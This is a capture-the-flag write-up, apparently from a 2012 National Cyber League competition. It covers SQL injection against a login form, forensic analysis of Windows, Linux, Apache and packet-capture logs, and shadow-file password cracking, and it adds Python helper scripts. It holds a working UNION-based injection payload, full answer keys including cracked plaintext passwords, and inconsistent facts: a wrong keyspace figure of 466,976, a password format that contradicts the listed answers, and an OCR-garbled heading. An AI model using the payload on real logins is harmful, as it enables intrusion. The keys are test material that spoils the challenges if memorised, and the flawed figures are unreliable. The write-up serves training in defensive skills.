The query that is built as a result of this injection will first query and then return zero results from the user table, and then union with the second query, which requests a table name from the information schema, removing the known default schemas from the output.
Congrats tblInventory. You are authenticated.
It just so happens that the first table is named "tblInventory." Further queries would confirm that this is the only other table in the database. Next the player will need to learn the columns within the inventory table. Again the INFORMATION_SCHEMA can be queried for this information.
The above injection provides us with one relevant column, item. This is likely the column the player needs to return for the flag value. But first the contestant must learn the name of the item identification number column. Utilizing the previous query with an added condition to ignore the "item" column should provide the next column in the inventory table.
Congrats itemNum. You are authenticated.
Now the player has the required information to craft the final query for the last flag of target six, and of round one.
' OR ''='' LIMIT 0 UNION SELECT item, item, item, item, item FROM tblInventory WHERE itemNum = 6 ORDER BY 'UserName
Congrats NCL-GSHI-9834. You are authenticated.
III. Round Two - Log Analysis
In the second round participants were to recover fifty (50) flags, found within six (6) different files (five log files, and one network data capture). The files were as follows: Windows Security Log, Corrupted Windows Security Log, Linux Authentication Log, Corrupted Linux Authentication Log, Apache Logs, Network Data Capture.
A. Scenario
Great Job Recruit! You demonstrated some good skills during that first FCA Capture-the-Flag Exercise!
Now, the time has come for some real cyber-sleuthing. It seems we have our first big case for you.
One of our client agencies was compromised. Luckily for us, they were able to get some logs, but sadly the attacker covered some of their tracks as well. The good news is the client was able to recover some of the deleted logs. The bad news is that the data is clearly corrupted, and they weren't able to figure out how to get them open again.
Here is what we know. An unidentified attacker accessed a Windows server; the next day a Linux server was compromised; and finally their web site was defaced. We've been given six files: a Windows Security Log, a Corrupted Windows Security Log, a Linux Authentication Log, a Corrupted Linux Authentication Log, the Apache Log Files, and a Network Data Capture from the compromised Web server.
Using these files, please try to uncover as much information as you can about the attacks. We have a questionnaire to help guide you through and help us find the relevant information.
Good luck recruit!
B. Flags

Name | Server | Value
Which user changed the system name? | 127.0.3.1 (Windows Security Log) | 100
Which user had a failed brute force attack run against it? | 127.0.3.1 (Windows Security Log) | 200
Which user account was successfully brute forced? | 127.0.3.1 (Windows Security Log) | 200
Which IP address launched the brute force? | 127.0.3.1 (Windows Security Log) | 200
After obtaining valid credentials, the attacker logs into the system via what protocol? | 127.0.3.1 (Windows Security Log) | 300
The attacker adds which user account to the system? | 127.0.3.1 (Windows Security Log) | 300
Which group, other than Administrators, was the attacker's account added to? | 127.0.3.1 (Windows Security Log) | 300
Which new group did the attacker create? | 127.0.3.1 (Windows Security Log) | 300
At what time did the attacker finally log out of the system? | 127.0.3.1 (Windows Security Log) | 400
Which user attempted to add themselves to the Administrator group? | 127.0.3.1 (Windows Security Log) | 500
Which account did the attacker log in with? | 127.0.3.2 (Corrupt Windows Security Log) | 600
What time did the attacker log in? | 127.0.3.2 (Corrupt Windows Security Log) | 600
What protocol did the attacker use to log in? | 127.0.3.2 (Corrupt Windows Security Log) | 600
What time was the last action logged by our attacker? | 127.0.3.2 (Corrupt Windows Security Log) | 700
The attacker transferred a file to the system via which protocol? | 127.0.3.2 (Corrupt Windows Security Log) | 700
During login the attacker's file is automatically run; what is the name of the file? | 127.0.3.2 (Corrupt Windows Security Log) | 700
After the attacker connects back via their trojan they gain SYSTEM privileges; what is the "New Process ID" for the process in which they obtain SYSTEM privileges? | 127.0.3.2 (Corrupt Windows Security Log) | 800
Which binary was run with "New Process ID" of 2185560096? | 127.0.3.2 (Corrupt Windows Security Log) | 900
A file named svchost.exe was stored within which directory under Joe Johnson's TEMP directory? | 127.0.3.2 (Corrupt Windows Security Log) | 1000
Which other file was created in Joe Johnson's TEMP directory? | 127.0.3.2 (Corrupt Windows Security Log) | 1000
Which user installed and configured SSH access to the system? | 127.0.3.3 (Linux Authentication Log) | 100
Which user had a failed brute force attack against them? | 127.0.3.3 (Linux Authentication Log) | 200
Which user account was successfully brute forced? | 127.0.3.3 (Linux Authentication Log) | 200
Which IP address launched the brute force attacks? | 127.0.3.3 (Linux Authentication Log) | 200
Which IP address did the attacker then use to connect to the system? | 127.0.3.3 (Linux Authentication Log) | 300
Which protocol did the attacker use to log in to the system? | 127.0.3.3 (Linux Authentication Log) | 300
What was the first file the attacker read once obtaining access to the system? | 127.0.3.3 (Linux Authentication Log) | 300
Which user account did the attacker add to the system? | 127.0.3.3 (Linux Authentication Log) | 300
At what time did the Authentication Token get altered for the user abrown? | 127.0.3.3 (Linux Authentication Log) | 400
Which IP address did the attacker telnet into from the compromised host? | 127.0.3.3 (Linux Authentication Log) | 500
Which user account does the attacker log in with? | 127.0.3.4 (Corrupt Linux Authentication Log) | 600
What IP address is the attacker coming from? | 127.0.3.4 (Corrupt Linux Authentication Log) | 600
Which protocol did the attacker use to log in? | 127.0.3.4 (Corrupt Linux Authentication Log) | 600
Which file did the attacker edit to provide their account root level permissions? | 127.0.3.4 (Corrupt Linux Authentication Log) | 700
The attacker transfers a trojan to the system using which protocol? | 127.0.3.4 (Corrupt Linux Authentication Log) | 700
The attacker modifies which file to ensure the trojan is executed on system startup? | 127.0.3.4 (Corrupt Linux Authentication Log) | 700
Which permission does the attacker give the trojan to ensure it has elevated privileges regardless of who runs it? | 127.0.3.4 (Corrupt Linux Authentication Log) | 800
What type of attack did the user launch at 09:47:27? | 127.0.3.4 (Corrupt Linux Authentication Log) | 900
The attacker changed the default permission for all future files and directories to what? (use long symbolic format) | 127.0.3.4 (Corrupt Linux Authentication Log) | 1000
The global shell profile was changed; what command was added to this profile? | 127.0.3.4 (Corrupt Linux Authentication Log) | 1000
Which IP address was used to launch a Nikto scan? | 127.0.3.5 (Apache Logs) | 100
Which IP address was used to launch a Nessus scan? | 127.0.3.5 (Apache Logs) | 100
What time did the NMAP scan start? | 127.0.3.5 (Apache Logs) | 200
Which browser was the attacker using when visiting the website? | 127.0.3.5 (Apache Logs) | 300
Which IP address did the attacker use when manually testing the web service? | 127.0.3.5 (Apache Logs) | 500
What HTTP Request Method is used to deface the website? | 127.0.0.6 (Network Data Capture) | 200
What is the sequence number for the packet which defaced the website? | 127.0.0.6 (Network Data Capture) | 300
What is the sequence number for the first packet that contains invalid TCP flag options? | 127.0.0.6 (Network Data Capture) | 1000
Which Snort Community Signature (ID) should fire on the web defacement? | 127.0.0.6 (Network Data Capture) | 1500
What flag was present on the defaced website? | 127.0.0.6 (Network Data Capture) | 5000
C. Windows Security Log
The provided Windows Security Log is in the Event Viewer log format, which should be opened with the Windows Event Viewer. After opening the log file, the flags are self-explanatory; each is simply found within the log. One shortcut that might expedite the search for the flag answers is to save the log in the Comma Separated Value (CSV) format, and then use a text-based editor to perform the required searches.
Flag Questions | Flag Answers
Which user changed the system name? | jjohnson
Which user had a failed brute force attack run against it? | tanderson
Which user account was successfully brute forced? | jsmith
Which IP address launched the brute force? | 192.168.243.131
After obtaining valid credentials, the attacker logs into the system via what protocol? | telnet
The attacker adds which user account to the system? | nsanders
Which group, other than Administrators, was the attacker's account added to? | Backup Operators
Which new group did the attacker create? | Support
At what time did the attacker finally log out of the system? | 12:47:13PM
Which user attempted to add themselves to the Administrator group? | emiller
D. Corrupt Windows Security Log
For this challenge the player was provided a Corrupted Windows Security Log. This log was also in the Windows Event Viewer format; however it would fail to open in the Windows Event Viewer.
Luckily for the player, they have the previously provided non-corrupt log to compare against. Opening the corrupted log file in a hex editor should reveal some useful information.
One thing is clear: corrupt or not, the file still contains pertinent log information. File types are very often determined by the very beginning of the file, and this is a common place for problems to begin. Comparing the beginning of the corrupted file to the known valid file will reveal the issue.
The player now simply needs to prepend the file with the proper hexadecimal value.
30000000
At this point the player can load the log in Event Viewer and retrieve the flags.
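The repair above works because the legacy .evt file header (ELF_LOGFILE_HEADER) is twelve little-endian DWORDs beginning with HeaderSize (0x30) and the "LfLe" signature and ending with a second 0x30; a file that starts directly with "LfLe" has lost exactly that first DWORD. The following added example, written for this write-up and not part of the challenge materials, diagnoses that condition, prepends the missing bytes, and checks that the restored header is internally consistent before trusting the result; the sample header it builds is constructed, not taken from the challenge file.

```python
import struct

# Legacy Windows event-log (.evt) file header, ELF_LOGFILE_HEADER: twelve little-endian
# DWORDs, 48 (0x30) bytes in total, bracketed by HeaderSize and EndHeaderSize (both 0x30).
EVT_HEADER_SIZE = 0x30
EVT_SIGNATURE = b"LfLe"            # stored at offset 4 in an intact file
EVT_HEADER_FMT = "<12I"


def diagnose_evt(data: bytes) -> str:
    """Classify the start of an .evt file: 'ok', 'missing_size_field' (the file begins at
    the signature, i.e. the leading DWORD 30 00 00 00 was lost) or 'unknown'."""
    if (len(data) >= 8 and data[:4] == struct.pack("<I", EVT_HEADER_SIZE)
            and data[4:8] == EVT_SIGNATURE):
        return "ok"
    if data[:4] == EVT_SIGNATURE:
        return "missing_size_field"
    return "unknown"


def repair_evt(data: bytes) -> bytes:
    """Prepend the HeaderSize DWORD when that is all that is missing, then verify the
    restored header before handing it back; anything else is left for manual analysis."""
    state = diagnose_evt(data)
    if state == "ok":
        return data
    if state != "missing_size_field":
        raise ValueError("not a recognisable .evt header; inspect it in a hex editor")
    fixed = struct.pack("<I", EVT_HEADER_SIZE) + data
    if len(fixed) < EVT_HEADER_SIZE:
        raise ValueError("file shorter than a complete header")
    fields = struct.unpack_from(EVT_HEADER_FMT, fixed)
    signature, major, minor, end_header_size = fields[1], fields[2], fields[3], fields[11]
    if (signature != int.from_bytes(EVT_SIGNATURE, "little") or (major, minor) != (1, 1)
            or end_header_size != EVT_HEADER_SIZE):
        raise ValueError("header fields inconsistent; damage goes beyond the first DWORD")
    return fixed


def repair_evt_file(src: str, dst: str) -> str:
    """Read a damaged log, write the repaired copy, and return the diagnosis of the input."""
    with open(src, "rb") as fh:
        data = fh.read()
    state = diagnose_evt(data)
    with open(dst, "wb") as fh:
        fh.write(repair_evt(data))
    return state


def build_sample_header() -> bytes:
    """Constructed, well-formed 48-byte header of an empty log, used only for demonstration."""
    fields = (EVT_HEADER_SIZE, int.from_bytes(EVT_SIGNATURE, "little"),
              1, 1,             # MajorVersion, MinorVersion
              0x30, 0x30,       # StartOffset, EndOffset (no records: both just past the header)
              1, 1,             # CurrentRecordNumber, OldestRecordNumber
              0x80000,          # MaxSize
              0, 0,             # Flags, Retention
              EVT_HEADER_SIZE)  # EndHeaderSize
    return struct.pack(EVT_HEADER_FMT, *fields)


if __name__ == "__main__":
    intact = build_sample_header()
    damaged = intact[4:]                 # simulate the challenge file: first DWORD gone
    print("damaged file starts with:", damaged[:8].hex(), "->", diagnose_evt(damaged))
    print("repaired file starts with:", repair_evt(damaged)[:8].hex())
```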
Flag Questions | Flag Answers
Which account did the attacker log in with? | nsanders
What time did the attacker log in? | 08:43:03AM
What protocol did the attacker use to log in? | telnet
What time was the last action logged by our attacker? | 10:06:38AM
The attacker transferred a file to the system via which protocol? | ftp
During login the attacker's file is automatically run; what is the name of the file? | a.exe
After the attacker connects back via their trojan they gain SYSTEM privileges; what is the "New Process ID" for the process in which they obtain SYSTEM privileges? | 2184204320
Which binary was run with "New Process ID" of 2185560096? | cscript.exe
A file named svchost.exe was stored within which directory under Joe Johnson's TEMP directory? | rad418D4.tmp
Which other file was created in Joe Johnson's TEMP directory? | OvZrvD.exe
E. Linux Authentication Log
For this challenge the participant is given a Linux Authentication Log, which contains a large number of log entries, on which the flag questions are based. Just like the non-corrupted Windows log, this section of flags is self-explanatory. The contestant simply needs to read the logs and find the relevant entries corresponding to the flags. It should be noted that the filename ended with a ".1", which should have been an indicator of the log file's format. Linux systems often rotate logs on a time or size basis; once a log reaches the predefined threshold, it is compressed and renamed with a number appended at the end (1 being the most recently rotated log, up through whatever maximum is configured, being the oldest). So in this case the player would indeed need to uncompress the log file before proceeding.
gzip -d -S ".1" NCL-R2-LAUTH.1
less NCL-R2-LAUTH
Flag Questions | Flag Answers
Which user installed and configured SSH access to the system? | abrown
Which user had a failed brute force attack against them? | mdavis
Which user account was successfully brute forced? | tanderson
Which IP address launched the brute force attacks? | 192.168.243.133
Which IP address did the attacker then use to connect to the system? | 192.168.243.191
Which protocol did the attacker use to log in to the system? | ssh
What was the first file the attacker read once obtaining access to the system? | /etc/shadow
Which user account did the attacker add to the system? | jbowers
At what time did the Authentication Token get altered for the user abrown? | 13:04:13
Which IP address did the attacker telnet into from the compromised host? | 192.168.243.234
F. Corrupt Linux Authentication Log
The player is provided with a Linux Authentication log that is corrupted. The file is compressed, due to log rotation, and a portion of the compressed file was truncated, resulting in its corruption. Once opened, the participant can easily answer the relevant flag questions, but simply using gzip won't do.
gzip -d -S ".1" blah.1
gzip: blah.1: unexpected end of file
But GZIP is a resilient compression format, and there is a vast number of Linux tools capable of helping us recover the data from within this log file. In fact even gzip itself is capable of reading the non-truncated data, simply by piping it the file contents. Alternatively the contestant can use zcat or some other GZIP compatible tool.
zcat NCL-R2-CLAUTH.log.1
At this point the player can now review the log entries and find the required flag answers.
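zcat can print most of a truncated member because deflate decodes incrementally: everything before the cut is recoverable, only the final record fragment and the CRC32/ISIZE trailer are gone. The following added example, written for this write-up and not part of the challenge materials, does the same recovery with Python's zlib, reports whether the stream actually ended, and discards the trailing partial record so it is not mistaken for evidence; the sample log it compresses and truncates is constructed, not the challenge's file.

```python
import gzip
import zlib

SAMPLE_LINES = 200  # size of the constructed sample log


def build_sample_log(lines: int = SAMPLE_LINES) -> bytes:
    """Constructed sshd-style auth log; hostnames, PIDs and addresses are synthetic."""
    template = (b"Oct %2d 09:47:%02d client-linux sshd[%d]: Failed password for invalid "
                b"user test from 10.0.0.%d port 4242 ssh2\n")
    return b"".join(template % (1 + i % 28, i % 60, 1000 + i, 1 + i % 250) for i in range(lines))


def truncate_gzip(blob: bytes, cut: int = 40) -> bytes:
    """Mimic the damaged challenge file: drop the last `cut` bytes, i.e. the 8-byte
    CRC32/ISIZE trailer plus the tail of the final deflate block."""
    return blob[:-cut]


def build_samples() -> tuple:
    """(plaintext log, intact gzip member, truncated gzip member) for the demonstration."""
    log = build_sample_log()
    intact = gzip.compress(log)
    return log, intact, truncate_gzip(intact)


def recover_truncated_gzip(blob: bytes) -> tuple:
    """Inflate whatever part of a gzip member is present, as zcat does before it
    complains. Returns (recovered_bytes, complete); complete is False when the stream
    ended early, which is the condition gzip reports as 'unexpected end of file'."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)  # 16 + MAX_WBITS: gzip header expected
    recovered = inflater.decompress(blob)
    recovered += inflater.flush()  # tolerates a missing trailer; no exception on truncation
    return recovered, inflater.eof


def complete_lines(recovered: bytes, complete: bool) -> list:
    """Split recovered bytes into records. A truncated stream ends mid-record, so the
    trailing fragment is dropped rather than reported as a real log line."""
    lines = recovered.decode("utf-8", errors="replace").split("\n")
    tail = lines.pop()  # '' when the data ended on a newline, otherwise a fragment
    if tail and complete:
        lines.append(tail)
    return lines


if __name__ == "__main__":
    log, intact, damaged = build_samples()
    data, ok = recover_truncated_gzip(damaged)
    records = complete_lines(data, ok)
    print(f"stream complete: {ok}; recovered {len(records)} of {SAMPLE_LINES} records")
```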
Flag Questions | Flag Answers
Which user account does the attacker log in with? | jbowers
What IP address is the attacker coming from? | 192.168.243.131
Which protocol did the attacker use to log in? | ssh
Which file did the attacker edit to provide their account root level permissions? | /etc/group
The attacker transfers a trojan to the system using which protocol? | http
The attacker modifies which file to ensure the trojan is executed on system startup? | /etc/rc.local
Which permission does the attacker give the trojan to ensure it has elevated privileges regardless of who runs it? | setuid
What type of attack did the user launch at 09:47:27? | fork bomb
The attacker changed the default permission for all future files and directories to what? (use long symbolic format) | -rw-rw-rw-
The global shell profile was changed; what command was added to this profile? | exit
G. Apache Log
This puzzle provides the contestant with an archive containing Apache Access and Error logs. With these files, the player simply needs to locate the relevant entries and answer the flag questions.
Flag Questions | Flag Answers
Which IP address was used to launch a Nikto scan? | 192.168.243.13
Which IP address was used to launch a Nessus scan? | 192.168.243.113
What time did the NMAP scan start? | 11:43:03
Which browser was the attacker using when visiting the website? | konqueror
Which IP address did the attacker use when manually testing the web service? | 192.168.243.113
H. Network Data Capture
In this puzzle the player is provided a collection of captured packets. The packets are stored in the industry standard libpcap format. As such the contestant should utilize a libpcap compatible network traffic analyzer, such as Wireshark or tcpdump.
The first three flags are obtainable by simply analyzing the traffic.
tcpdump -nnr NCL-R2-ND.pcap | less
tcpdump -Xnnr NCL-R2-ND.pcap | less
tcpdump -Annr NCL-R2-ND.pcap | less
The first flag question asks which HTTP Request Method is used to deface the website. Knowing the fundamentals of HTTP should quickly alert the player to the usage of the "PUT" method in the traffic.
15:21:47.113411 IP 192.168.245.131.58246 > 192.168.245.141.80: Flags [P.], seq 1:235, ack 1, win 913, options [nop,nop,TS val 53158427 ecr 6560569], length 234 E...R.@.@.z............P..p.t.,t....n...... .+"..d.9PUT /admin/update.php HTTP/1.1 Host: 192.168.245.141 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: text/plain Content-Length: 67
Further review confirms that indeed the "PUT" method was used to deface the website.
The next two flag questions simply require further review and searching of the network traffic. The last flag question however is worth quite a large number of points. The question presented is what the image (now being displayed on the defaced website) says. This requires the player to perform data carving on the network traffic to extract the image (which is clearly sent in the traffic).
The tcpxtract utility does a great job of extracting files from a network stream or libpcap file.
tcpxtract -f NCL-R2-ND.pcap
Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:21376], exporting to 00000000.gif
Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:21376], exporting to 00000001.gif
Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:21632], exporting to 00000002.gif
Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:28032], exporting to 00000003.gif
Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:28544], exporting to 00000004.gif
Found file of type "jpg" in session [192.168.245.141:20480 -> 192.168.245.131:28288], exporting to 00000005.jpg
Found file of type "png" in session [192.168.245.131:20480 -> 192.168.245.141:42439], exporting to 00000006.png
Found file of type "png" in session [192.168.245.141:20480 -> 192.168.245.131:36992], exporting to 00000007.png
IV. Round Three - Cryptography
The third round of the NCL competition included a number of cryptography related challenges, ranging from simple cryptography systems to complex steganography puzzles.
A. Scenario
Congratulations on yet another job well done! Your log analysis reports helped us piece together what really happened during the attack on our client's systems. In fact, you've also helped us identify some weaknesses in our client's cybersecurity posture.
Based on the information you uncovered during the log analysis, we've come to understand that password complexity was severely lacking at our client's organization. Therefore, we have asked the client to send over their password files.
Based on your log analysis work, the client identified some additional clues that the 'not so careful' attacker left behind. Unfortunately, most of the data the attacker left behind is encrypted or encoded in some fashion.
Your mission is as follows: do some password security analysis and testing on the client's password files, and go through the artifacts from the client's attack to see what you can uncover.
We need to secure this system, so this doesn't happen again.
Thanks again for your dedicated service and a job well done!
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 46 8. I|ags
Name | Server | Value
What hashing algorithm is in use for Emily Miller's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Tom Anderson's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Amanda Williams's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Michael Davis's account? | 127.0.0.1 (Linux Passwords) | 100
What hashing algorithm is in use for Daniel Jameson's account? | 127.0.0.1 (Linux Passwords) | 100
What is the plaintext password for Emily Miller's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Tom Anderson's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Amanda Williams's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Michael Davis's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Daniel Jameson's account? | 127.0.0.1 (Linux Passwords) | 200
What is the plaintext password for Kim Jones's account? | 127.0.0.1 (Linux Passwords) | 300
What is the plaintext password for Brandon Davidson's account? | 127.0.0.1 (Linux Passwords) | 400
What is the plaintext password for Aaron Brown's account? | 127.0.0.1 (Linux Passwords) | 500
What is the plaintext password for John Smith's account? | 127.0.0.1 (Linux Passwords) | 1000
What is the plaintext password for the attacker's account (jbowers)? | 127.0.0.1 (Linux Passwords) | 2500
What is the plaintext password for the root account? | 127.0.0.1 (Linux Passwords) | 2500
What is the plaintext password for John Smith's account? | 127.0.0.2 (Windows Passwords) | 100
What is the plaintext password for James Johnson's account? | 127.0.0.2 (Windows Passwords) | 100
What is the plaintext password for Emily Miller's account? | 127.0.0.2 (Windows Passwords) | 200
What is the plaintext password for Tom Anderson's account? | 127.0.0.2 (Windows Passwords) | 200
What is the plaintext password for Amanda Williams's account? | 127.0.0.2 (Windows Passwords) | 200
What is the plaintext password for Michael Davis's account? | 127.0.0.2 (Windows Passwords) | 200
What is the plaintext password for Daniel Jameson's account? | 127.0.0.2 (Windows Passwords) | 200
What is the plaintext password for Kim Jones's account? | 127.0.0.2 (Windows Passwords) | 300
What is the plaintext password for Brandon Davidson's account? | 127.0.0.2 (Windows Passwords) | 400
What is the plaintext password for Aaron Brown's account? | 127.0.0.2 (Windows Passwords) | 500
What is the plaintext password for the attacker's account (nsanders)? | 127.0.0.2 (Windows Passwords) | 2500
What is the plaintext password for the Administrator account? | 127.0.0.2 (Windows Passwords) | 2500
What is the first Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 300
What is the second Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 300
What is the third Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 300
What is the flag for the first Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 100
What is the passphrase for the key-pair? | 127.0.0.4 (Advanced Cryptography) | 5000
Using the previous key-pair, what is the fifth Advanced Cryptography flag? | 127.0.0.4 (Advanced Cryptography) | 5000
What is the flag for the second Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 200
What is the flag for the third Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 200
What is the flag for the fourth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 200
What is the flag for the fifth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 500
What is the flag for the sixth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 600
What is the flag for the seventh Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 600
What is the flag for the eighth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 700
What is the flag for the ninth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 900
What is the flag for the tenth Basic Cryptography puzzle? | 127.0.0.3 (Basic Cryptography) | 2000
What is the flag found in the first Steganography challenge? | 127.0.0.5 (Steganography) | 200
What is the flag found in the second Steganography challenge? | 127.0.0.5 (Steganography) | 200
What is the flag found in the third Steganography challenge? | 127.0.0.5 (Steganography) | 300
What is the flag found in the fourth Steganography challenge? | 127.0.0.5 (Steganography) | 300
What is the flag found in the fifth Steganography challenge? | 127.0.0.5 (Steganography) | 500
What is the flag found in the sixth Steganography challenge? | 127.0.0.5 (Steganography) | 500
What is the flag found in the seventh Steganography challenge? | 127.0.0.5 (Steganography) | 5000
C. Linux Passwords
The player was provided with a complete Linux /etc/shadow file, containing the hashed versions of all user passwords. The contestant was then asked to find a series of flags, namely the cryptographic hashing algorithm or the password itself.
1. Hashing Algorithms
The first five (5) flags ask simply for the hashing algorithm used for the particular user's password hash. This is easily obtainable from the beginning part of the hash.
Linux hashes within the /etc/shadow file start with a dollar sign followed by a numerical value representing the hashing algorithm, with the single exception of unsalted DES hashes, which just provide the hash.
Flag Questions | Flag Answers
What hashing algorithm is in use for Emily Miller's account? | DES
What hashing algorithm is in use for Tom Anderson's account? | md5
What hashing algorithm is in use for Amanda Williams's account? | DES
What hashing algorithm is in use for Michael Davis's account? | SHA256
What hashing algorithm is in use for Daniel Jameson's account? | sha512
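The prefix lookup described above, written out as a small shadow-file auditor. This is an added example, not part of the NCL challenge material or its tooling: the function names are mine, the sample shadow lines are constructed, and their digests are placeholders. It maps the crypt(3) "$id$" prefixes to algorithm names, treats a bare 13-character field as traditional DES (the first two characters of which are the salt), and reports which accounts still rely on schemes that are cheap to brute-force.

```python
"""Identify the hashing scheme of each /etc/shadow entry and flag weak ones.

Added example for this write-up, not part of the NCL challenge material.
The sample shadow lines are constructed and their digests are placeholders.
"""
import re

# crypt(3) "$id$" prefixes and the algorithm each denotes. Traditional DES
# entries carry no prefix: 13 characters from the crypt alphabet, the
# first two of which are the salt.
CRYPT_IDS = {
    "1": "MD5",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "SHA-256",
    "6": "SHA-512",
    "y": "yescrypt",
}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
WEAK = {"DES", "MD5"}   # fast schemes that are cheap to brute-force; report them


def identify_hash(field):
    """Return the algorithm name for one shadow password field."""
    if field in ("", "*") or field.startswith("!"):
        return "locked/no password"
    if field.startswith("$"):
        crypt_id = field.split("$")[1]      # field starts with '$', so index 1
        return CRYPT_IDS.get(crypt_id, "unknown ($%s$)" % crypt_id)
    if DES_RE.match(field):
        return "DES"
    return "unknown"


def audit_shadow(text):
    """Parse shadow-format text; return {user: (algorithm, is_weak)}."""
    result = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        algo = identify_hash(fields[1])
        result[fields[0]] = (algo, algo in WEAK)
    return result


# Constructed sample (not the challenge file); digests are placeholders.
SAMPLE_SHADOW = """\
emiller:abJnggxhB/yWI:15600:0:99999:7:::
tanderson:$1$saltsalt$0123456789abcdefghijkl:15600:0:99999:7:::
mdavis:$5$rounds=5000$saltsalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFG:15600:0:99999:7:::
djameson:$6$saltsalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstu:15600:0:99999:7:::
daemon:*:15600:0:99999:7:::
"""

if __name__ == "__main__":
    for user, (algo, weak) in audit_shadow(SAMPLE_SHADOW).items():
        print("%-10s %-20s %s" % (user, algo, "WEAK" if weak else "ok"))
```

The weak set is deliberately small; on a real system the same report would also be the place to check `rounds=` parameters and accounts whose field is empty rather than locked.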
2. Cracked Passwords
Simply enough, the requirement was to crack eleven (11) Linux passwords and submit the cracked plaintext password as the flag.
Of these eleven (11) passwords, the first five (5) were dictionary terms. The next two (2) were dictionary terms beginning with a capital letter and appended with a numerical digit, a simple permutation. The following three (3) are a slightly more complex permutation, two dictionary terms separated by a numerical digit. The last two passwords were by far the most difficult, using the standard NCL format; these were a total of thirteen characters long and contained two symbols, four alphabetic characters and four numerical digits.
Regardless, the entire password list was breakable with simple tools such as John the Ripper.
Some clever permutation rules or custom dictionary files would certainly make the last two (complex) passwords much easier to crack. The player knew the NCL format followed a predictable pattern: the letters "N", "C", and "L" followed by a single hyphen, then four random alphabetical characters, another hyphen, and then four random numerical characters. With this information the relative number of characters needing to be tested goes down to eight, thus limiting the entire maximum possible passwords to only 466,976.
Flag Questions | Flag Answers
What is the plaintext password for Emily Miller's account? | iloveyou
What is the plaintext password for Tom Anderson's account? | password
What is the plaintext password for Amanda Williams's account? | Qwerty
What is the plaintext password for Michael Davis's account? | blink182
What is the plaintext password for Daniel Jameson's account? | Whatever
What is the plaintext password for Kim Jones's account? | Password1
What is the plaintext password for Brandon Davidson's account? | Welcome2
What is the plaintext password for Aaron Brown's account? | cat8dog
What is the plaintext password for John Smith's account? | admin4you
What is the plaintext password for the attacker's account (jbowers)? | nCL-AluP-7398
What is the plaintext password for the root account? | nCL-lCCW-2309
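The four password classes the section describes (dictionary word, capitalised word plus digit, word-digit-word, and the NCL mask) are exactly what a password-policy audit should be able to name. The following is an added example, not the challenge's own tooling: `classify`, `summarize` and `ncl_mask_keyspace` are my names, the tiny `WORDS` set stands in for a real wordlist, and the sample passwords are constructed. It adds one further class ("word+digits", for the blink182 shape) and sizes the NCL mask as 26^4 = 456,976 letter blocks multiplied by 10^4 digit blocks.

```python
"""Classify recovered passwords by the weak patterns this write-up
describes and size the NCL flag mask. Added example, not part of the
challenge material; WORDS is a hypothetical mini dictionary and SAMPLE is
a constructed list."""
import re
from string import ascii_uppercase, digits

# Hypothetical mini dictionary; a real audit would load a full wordlist.
WORDS = {"iloveyou", "password", "qwerty", "whatever", "welcome",
         "cat", "dog", "admin", "you", "blink"}

NCL_MASK = re.compile(r"^NCL-[A-Z]{4}-[0-9]{4}$")


def classify(pw):
    """Return the first (weakest) pattern the password matches, or 'other'."""
    low = pw.lower()
    if NCL_MASK.match(pw):
        return "ncl-format"
    if low in WORDS:
        return "dictionary"
    # Capitalised word followed by a single digit, e.g. Welcome2
    m = re.match(r"^([A-Z][a-z]+)(\d)$", pw)
    if m and m.group(1).lower() in WORDS:
        return "word+digit"
    # Two words separated by one digit, e.g. cat8dog
    m = re.match(r"^([a-z]+)(\d)([a-z]+)$", low)
    if m and m.group(1) in WORDS and m.group(3) in WORDS:
        return "word+digit+word"
    # A word with trailing digits, e.g. blink182
    m = re.match(r"^([a-z]+)(\d+)$", low)
    if m and m.group(1) in WORDS:
        return "word+digits"
    return "other"


def ncl_mask_keyspace():
    """Candidates matching NCL-????-####: 26^4 letter blocks (456,976)
    times 10^4 digit blocks, i.e. 4,569,760,000 in total."""
    return len(ascii_uppercase) ** 4 * len(digits) ** 4


def summarize(passwords):
    """Count how many passwords fall into each pattern class."""
    counts = {}
    for pw in passwords:
        c = classify(pw)
        counts[c] = counts.get(c, 0) + 1
    return counts


# Constructed sample list for the demonstration.
SAMPLE = ["iloveyou", "Qwerty", "blink182", "Welcome2", "cat8dog",
          "admin4you", "NCL-ABCD-1234", "K8#vq!Lm2"]

if __name__ == "__main__":
    for pw in SAMPLE:
        print("%-16s %s" % (pw, classify(pw)))
    print(summarize(SAMPLE))
    print("NCL mask keyspace:", ncl_mask_keyspace())
```

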